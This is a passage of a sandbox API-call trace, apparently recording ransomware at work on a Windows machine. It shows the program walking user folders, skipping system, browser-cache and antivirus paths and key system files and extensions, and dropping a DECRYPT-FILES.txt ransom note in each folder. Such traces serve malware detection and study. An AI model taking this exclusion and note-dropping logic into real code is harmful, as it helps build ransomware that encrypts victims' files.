ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaab7c980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab7c980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0078.057] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.057] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaab7c980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab7c980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.057] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.057] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.057] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0078.057] lstrcmpW (lpString1="Connections", lpString2=".") returned 1 [0078.057] lstrcmpW (lpString1="Connections", lpString2="..") returned 1 [0078.057] lstrcatW (in: lpString1="Connections", lpString2="\\" | out: lpString1="Connections\\") returned="Connections\\" [0078.057] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="Connections\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\" [0078.057] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\Program Files") returned 0x0 [0078.057] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch=":\\Windows") returned 0x0 [0078.057] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\Games\\") returned 0x0 [0078.057] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.057] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.057] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.058] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.058] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.058] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\All Users") returned 0x0 [0078.058] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.058] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.058] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.058] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="AhnLab") returned 0x0 [0078.058] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.058] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned 76 [0078.058] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.058] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\\\jkbimi8.tmp") returned 88 [0078.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0078.058] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned 76 [0078.058] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.058] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\\\DECRYPT-FILES.txt") returned 94 [0078.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0078.060] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0078.061] CloseHandle (hObject=0x454) returned 1 [0078.061] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned 76 [0078.061] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0078.061] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0078.061] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.061] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.061] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.061] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.061] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaba2ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.061] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.061] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab7c980, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab7c980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab7c980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.061] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.061] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.061] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.061] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.061] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.061] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.061] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.062] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.062] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.062] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.062] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.062] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.062] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.062] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.062] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.062] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned 76 [0078.062] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.062] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\" [0078.062] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\jkbimi8.tmp" [0078.062] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.062] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.062] CloseHandle (hObject=0x0) returned 0 [0078.062] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.062] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pbk", cAlternateFileName="")) returned 1 [0078.063] lstrcmpW (lpString1="Pbk", lpString2=".") returned 1 [0078.063] lstrcmpW (lpString1="Pbk", lpString2="..") returned 1 [0078.063] lstrcatW (in: lpString1="Pbk", lpString2="\\" | out: lpString1="Pbk\\") returned="Pbk\\" [0078.063] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="Pbk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\" [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\Program Files") returned 0x0 [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch=":\\Windows") returned 0x0 [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\Games\\") returned 0x0 [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\All Users") returned 0x0 [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="AhnLab") returned 0x0 [0078.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.063] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned 80 [0078.063] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.063] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\\\jkbimi8.tmp") returned 92 [0078.063] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0078.063] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned 80 [0078.063] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.064] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\\\DECRYPT-FILES.txt") returned 98 [0078.064] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0078.064] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0078.065] CloseHandle (hObject=0x45c) returned 1 [0078.065] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned 80 [0078.065] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0078.065] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0078.065] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.065] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.065] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.065] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.065] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaba2ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.065] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.065] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaba2ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.065] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.065] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.065] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.066] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.066] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.066] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.066] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.066] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.066] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.066] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.066] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.066] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.066] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.066] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.066] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.066] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned 80 [0078.066] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.066] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\" [0078.066] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\jkbimi8.tmp" [0078.066] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.066] CloseHandle (hObject=0x0) returned 0 [0078.066] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.067] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0078.067] lstrcmpW (lpString1="_hiddenPbk", lpString2=".") returned 1 [0078.067] lstrcmpW (lpString1="_hiddenPbk", lpString2="..") returned 1 [0078.067] lstrcatW (in: lpString1="_hiddenPbk", lpString2="\\" | out: lpString1="_hiddenPbk\\") returned="_hiddenPbk\\" [0078.067] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="_hiddenPbk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\Program Files") returned 0x0 [0078.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 